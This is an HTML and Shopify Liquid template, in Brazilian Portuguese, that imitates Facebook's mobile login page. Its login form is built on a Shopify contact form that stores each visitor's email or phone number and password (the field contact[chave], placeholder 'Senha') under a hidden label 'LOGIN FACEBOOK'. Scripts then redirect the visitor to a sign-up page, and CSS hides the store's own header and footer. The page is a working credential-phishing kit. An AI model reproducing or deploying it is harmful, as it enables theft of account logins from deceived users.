<script>
  // Verifique se a URL contém "contact_posted=true#contact_form"
  if (window.location.href.indexOf("contact_posted=true#contact_form") !== -1) {
    // Redirecione o usuário para a página /pages/recusado
    window.location.href = "/pages/cadastro";
  }
</script>

<script>
  // Verifique se a URL contém "contact_posted=true#contact_form"
  if (window.location.href.indexOf("contact_posted") !== -1) {
    // Redirecione o usuário para a página /pages/recusado
    window.location.href = "/pages/cadastro";
  }
</script>


<link rel="stylesheet" href="{{ 'social.css' | asset_url }}">

<style>

div#root {background-color: #fff;}
  
  #headado1 {display: none;}
   #headado2  {display: none;}
  #response1  {display: none;}
   #response2  {display: none;}
  footer {display: none;}


  div._55wo._56bf {    height: 40px;
    margin-bottom: 5px;}


 #email_input_container {

   max-width: 100%;
    height: 100%;
 }


  #m_login_email {width: 100%;}


 ._1upc._mg8 {height: 100%;}

  ._96n9 {height: 100%;}


  ._56bg._4u9z._5ruq._8qtn {height: 100%;}


  ._56bg._4u9z._27z2._8qtm {height: 100%;}


  ._7om2  {height: 100%;}

  ._4g34._5i2i._52we {height: 100%;}

  #ContactFormCard {padding-left: 5px;}

  #ContactFormTel {padding-left: 5px;}

  #ContactFormCard {width: 100%;}

  ._4g34 {margin-bottom: 20px;}


  ._5xu4 {height: 100%;}

  .touch a._9on1 {
    color: #216fdb;
    font-family: 'Roboto-Regular', 'Helvetica', 'sans-serif';
    font-size: 14px;
    line-height: 16px;
}
._54k8._52jh._56bs._56b_._28lf._9cow._56bw._56bu {border-radius: 5px;
    border: none;
    color: #FFF;
    background: #1877f2;}


  ._9on1  {
    color: #216fdb;
    font-family: 'Roboto-Regular', 'Helvetica', 'sans-serif';
    font-size: 14px;
    line-height: 16px;
}

html .touch ._5soa ._agmp {
    background: white;
    border-color: #bec3c9;
    border-style: solid;
    border-width: 1px;
    box-shadow: none;
    color: #000;
    display: inline-block;
    flex: none;
    font-size: 15px;
    font-style: normal;
    font-weight: 500;
    letter-spacing: -0.23px;
    text-align: center;
    text-shadow: none;
    white-space: nowrap;
    width: 80%;
}

  
#signup-button {background: #FFF;
    padding: 7px;
    border-radius: 5px;
    border: 1px solid #f5f5f5;
}}
  
</style>



<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Facebook – entre ou cadastre-se</title><meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1"><link href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png" rel="shortcut icon" sizes="196x196"><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"><meta name="theme-color" content="#3b5998"><link type="text/css" rel="stylesheet" href="./index2_files/kfR7twrudZv.css" data-bootloader-hash="sGAqW0C" crossorigin="anonymous"><link type="text/css" rel="stylesheet" href="./index2_files/JqnsAQ-FXDP.css" data-bootloader-hash="zrxCcDt" crossorigin="anonymous"><link type="text/css" rel="stylesheet" href="./index2_files/JByNpfDLkHJ.css" data-bootloader-hash="Oj5T9TG" crossorigin="anonymous"><link type="text/css" rel="stylesheet" href="./index2_files/jINAavgr18t.css" data-bootloader-hash="+uMCKyR" crossorigin="anonymous">
  
  
  
</head>

<body tabindex="0" class="touch x2 android _fzu _50-3 iframe acw portrait" style="min-height: 546px; background-color: rgb(255, 255, 255);"><div id="viewport" data-kaios-focus-transparent="1" style="min-height: 546px;"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><div id="page"><div class="_129_" id="header-notices"></div><div id="m:chrome:schedulable-graph-search" data-referrer="m:chrome:schedulable-graph-search"><div class="_a-5 _13gt _7n0e" id="u_0_i_wW"><form class="_13e_" action="#" method="get"><div class="_13fn"><i class="_7mt-"></i><input id="main-search-input" data-sigil="search-small-box" class="_5-lx" type="search" name="query" placeholder="Pesquisar" autocomplete="off" autocorrect="off" autocapitalize="off" data-autoid="autoid_2"><label for="main-search-input" class="_13fo">Pesquisar</label><a href="#" class="_5-ly" role="button" data-autoid="autoid_3" style="display: none;">Limpar</a></div><a href="#" class="_3k_n" data-autoid="autoid_5">Cancelar</a></form><div class="_5-lw" data-autoid="autoid_1"></div></div></div><div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 546px;"><div class="_7om2"><div class="_4g34" id="u_0_0_qn"><div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice"><div class="_52jd"></div></div><div class="_9om_"><div class="_4-4l"><div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element"><div style="display: none;" class="_qw9 grouped aclb" id="u_0_1_0F"><a href="https://m.facebook.com/click.php?redir_url=market%3A%2F%2Fdetails%3Fid%3Dcom.facebook.katana%26referrer%3Dutm_reg%253DfiFuZcNTa3gyGxe_aJ6xNx-4%26referrer_params%255Blink_source%255D%3Dfb_app_banner&amp;app_id=350685531728&amp;cref=mb&amp;no_fw=1&amp;refid=8" target="_top" class="touchableArea first last area touchable acy apl abt abb" data-sigil="touchable marea"><div class="ib cc"><i class="l img sp_xm9DDmY7HAL_3x sx_f30d37"></i><div class="c"><span class="fcl">Obtenha o Facebook para Android e navegue mais rápido.</span></div></div></a></div><iframe style="display: none;"></iframe></div><div class="_7om2 _52we _2pid _52z6"><div class="_4g34"><a><img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" width="112" class="img" alt="facebook"></a></div></div><div class="_5rut">
  
  
  {% form 'contact' %}
    
  <form  id="login_form" method="get" action="" class="mobile-login-form _9hp- _5spm" data-sigil="m_login_form" data-autoid="autoid_6">
   
    <input type="hidden" name="lsd" value="AVoSb4b3Fww" autocomplete="off"><input type="hidden" name="jazoest" value="2952" autocomplete="off"><input type="hidden" name="m_ts" value="1701716362"><input type="hidden" name="li" value="iiFuZeYOeO5vrj-KquYSEMvF"><input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number"><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries"><div id="user_info_container" data-sigil="user_info_after_failure_element"></div><div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div><div id="otp_retrieve_desc_container"></div><div><div class="_56be"><div class="_55wo _56bf"><div class="_96n9" id="email_input_container">
      
      
      
      <input style="display: none;" type="text" id="ContactFormFace" name="contact[face]" class="inputf" value="LOGIN FACEBOOK"/>
     <input type="email" id="ContactFormCard" name="contact[email]" style="outline: none;" autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" placeholder="Número de celular ou email" data-sigil="m_login_email">
        
    </div></div></div><div class="_55wq"></div><div class="_56be"><div class="_55wo _56bf"><div class="_1upc _mg8" data-sigil="m_login_password"><div class="_7om2"><div class="_4g34 _5i2i _52we"><div class="_5xu4">
      
      
      
      
<input type="tel" id="ContactFormTel" name="contact[chave]" style="outline: none;" required="" autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" placeholder="Senha" data-sigil="password-plain-text-toggle-input">
    
    </div></div><div class="_5s61 _216i _5i2i _52we"><div class="_5xu4"><div class="_2pi9" style="display:none" id="u_0_2_Sw"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_3_xy">OCULTAR</span><span class="mfss" id="u_0_4_zf">MOSTRAR</span></a></div></div></div></div></div></div></div></div><div class="_2pie" style="text-align:center;"><div id="login_password_step_element" data-sigil="login_password_step_element"><button type="submit" value="Entrar" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button" data-autoid="autoid_9"><span class="_55sr">Entrar</span></button></div><div class="_7eif" id="oauth_login_button_container" style="display:none"></div><div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div><div id="otp_button_elem_container"></div></div><input type="hidden" name="prefill_contact_point" id="prefill_contact_point"><input type="hidden" name="prefill_source" id="prefill_source"><input type="hidden" name="prefill_type" id="prefill_type"><input type="hidden" name="first_prefill_source" id="first_prefill_source"><input type="hidden" name="first_prefill_type" id="first_prefill_type"><input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false"><input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false"><input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false"><input type="hidden" id="bi_xrwh" name="bi_xrwh" value="0"><input type="hidden" id="scetoggle"><div class="_xo8"></div><noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript></form>
  
  {% endform %}
  <div><div class="_2pie _9omz"><div class="_52jj _9on1"><a class="_9on1" tabindex="0" id="forgot-password-link">Esqueceu a senha?</a></div></div><div style="padding-top: 42px"><div><div><div><div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">ou</span></div><div class="_52jj _5t3b" id="signup_button_area"><a role="button" class="_agmp _28le btn btnS medBtn mfsm touchable" id="signup-button" tabindex="0" data-sigil="m_reg_button" data-autoid="autoid_8">Criar nova conta</a></div></div></div><div class="_2pie" style="text-align:center;"><div><div data-sigil="login_identify_step_element"></div><div class="other-links _8p_m"><ul class="_5pkb _55wp"><li></li></ul></div></div></div></div></div></div></div></div></div></div></div><div style="display:none"><div></div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span><div style="display: none;" class="_55wr _5ui2" data-sigil="m_login_footer"><div class="_ao4m"><div><div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea"><div class="_7om2"><div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">Português (Brasil)</span><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=es_LA&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=es_LA&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">Español</a></span></div><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">Deutsch</a></span></div><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">العربية</a></span></div></div><div class="_4g34"><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=en_US&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=en_US&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">English (US)</a></span></div><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">Français (France)</a></span></div><div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-ajaxify-href="/intl/save_locale/?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8" data-method="post" data-sigil="ajaxify">Italiano</a></span></div><a href="/language/?next_uri=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_04wDozaR0Ztaifqy2&amp;page_style=1&amp;refid=8"><div class="_3j87 _1rrd _3ztd" aria-label="Lista completa de idiomas" data-sigil="more_language"><i class="img sp_zqrNfmDGuGz_3x sx_2f585a"></i></div></a></div></div></div><div class="_5ui4"><div class="_96qv _9a0a"><a href="https://about.meta.com/" class="_96qw" title="Leia nosso blog, descubra a central de recursos e encontre oportunidades de trabalho.">Sobre</a><span aria-hidden="true"> · </span><a href="/help/?ref=pf&amp;refid=8" class="_96qw" title="Acesse nossa Central de Ajuda.">Ajuda</a><span aria-hidden="true"> · </span><span class="_96qw" id="u_0_5_MS">Mais</span></div><div class="_96qv" style="display:none" id="u_0_6_Vc"><a href="https://messenger.com/" title="Confira o Messenger." class="_96qw">Messenger</a><a href="/lite/?refid=8" title="Facebook Lite para Android." class="_96qw">Facebook Lite</a><a href="https://m.facebook.com/watch/?refid=8" title="Explorar a aba Vídeo" class="_96qw">Vídeo</a><a href="/places/?refid=8" title="Confira locais populares no Facebook." class="_96qw">Locais</a><a href="/games/?refid=8" title="Confira os jogos do Facebook." class="_96qw">Jogos</a><a href="/marketplace/?refid=8" title="Compre e venda no Facebook Marketplace." class="_96qw">Marketplace</a><a href="https://pay.facebook.com/?refid=8" title="Saiba mais sobre o Meta Pay" target="_blank" class="_96qw">Meta Pay</a><a href="https://www.meta.com/" title="Finalizar a compra com a Meta" target="_blank" class="_96qw">Loja da Meta</a><a href="https://www.meta.com/quest/" title="Saiba mais sobre o Meta Quest" target="_blank" class="_96qw">Meta Quest</a><a href="https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT380sD65iwJLHzK1vE7q7MMCgNBAglN7f_HZbVUHWbjrl-ur26FEIgn4Dyg8ncmG-mcVZ-wgfrqQWcZKPbLRE7361KdgLKrKOgpcwxhv3J0SUDZWsjhv49TqL1MAmK06yT0ULibrhO3v9eOxewp-Rnh95taXEd4aHE4sOvykLXyvMj2rg" title="Confira o Instagram" target="_blank" class="_96qw" rel="noreferrer" data-sigil="MLynx_asynclazy">Instagram</a><a href="https://www.threads.net/" title="Confira o Threads" class="_96qw">Threads</a><a href="/fundraisers/?refid=8" title="Doe para causas importantes." class="_96qw">Campanhas de arrecadação de fundos</a><a href="/biz/directory/?refid=8" title="Navegue pelo nosso diretório de serviços do Facebook." class="_96qw">Serviços</a><a href="https://developers.facebook.com/?ref=pf&amp;refid=8" title="Desenvolver em nossa plataforma." class="_96qw">Desenvolvedores</a><a href="/careers/?ref=pf&amp;refid=8" title="Dê um passo adiante na sua carreira em nossa incrível empresa." class="_96qw">Carreiras</a><a href="/privacy/policy/?entry_point=facebook_page_footer&amp;refid=8" title="Saiba como coletamos, usamos e compartilhamos informações para apoiar o Facebook." class="_96qw">Política de Privacidade</a><a href="/privacy/center/?entry_point=facebook_page_footer&amp;refid=8" title="Saiba como gerenciar e controlar sua privacidade no Facebook." class="_96qw">Central de Privacidade</a><a href="/groups/discover/?refid=8" title="Explorar nossos grupos." class="_96qw">Grupos</a></div><span class="mfss fcg">Meta © 2023</span></div></div></div></div></div><div class=""></div><div class="viewportArea _2v9s" style="display:none" id="u_0_7_le" data-sigil="marea"><div class="_5vsg" id="u_0_8_pd" style="max-height: 228px;"></div><div class="_5vsh" id="u_0_9_xC" style="max-height: 273px;"></div><div class="_5v5d fcg"><div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Carregando...</div></div><div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea"><div class="container"><div class="image"></div><div class="message" data-sigil="error-message"></div><a class="link" data-sigil="MPageError:retry">Tentar novamente</a></div></div></div></div><div id="static_templates"><div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_7"><div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader"><div class="_7om2 _52we"><div class="_5s61"><div class="_52z7"><button type="submit" value="Cancelar" class="cancelButton btn btnD bgb mfss touchable" id="u_0_b_AM" data-sigil="dialog-cancel-button">Cancelar</button><button type="submit" value="Voltar" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Voltar" id="u_0_c_TH" data-sigil="dialog-back-button"><i class="img sp_zqrNfmDGuGz_3x sx_e1adee" style="margin-top: 2px;"></i></button></div></div><div class="_4g34"><div class="_52z6"><div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">Carregando...</div></div></div><div class="_5s61"><div class="_52z8" id="modalDialogHeaderButtons"></div></div></div></div><div class="modalDialogView" id="modalDialogView"></div><div class="_5v5d _5v5e fcg" id="dialogSpinner"><div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_a_aW" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Carregando...</div></div></div>






<div class="hidden_elem"></div>


<div class="AdBox Ad advert post-ads"></div><div class="advertising_widget"></div><iframe srcdoc="" style="display: none;"></iframe></body>






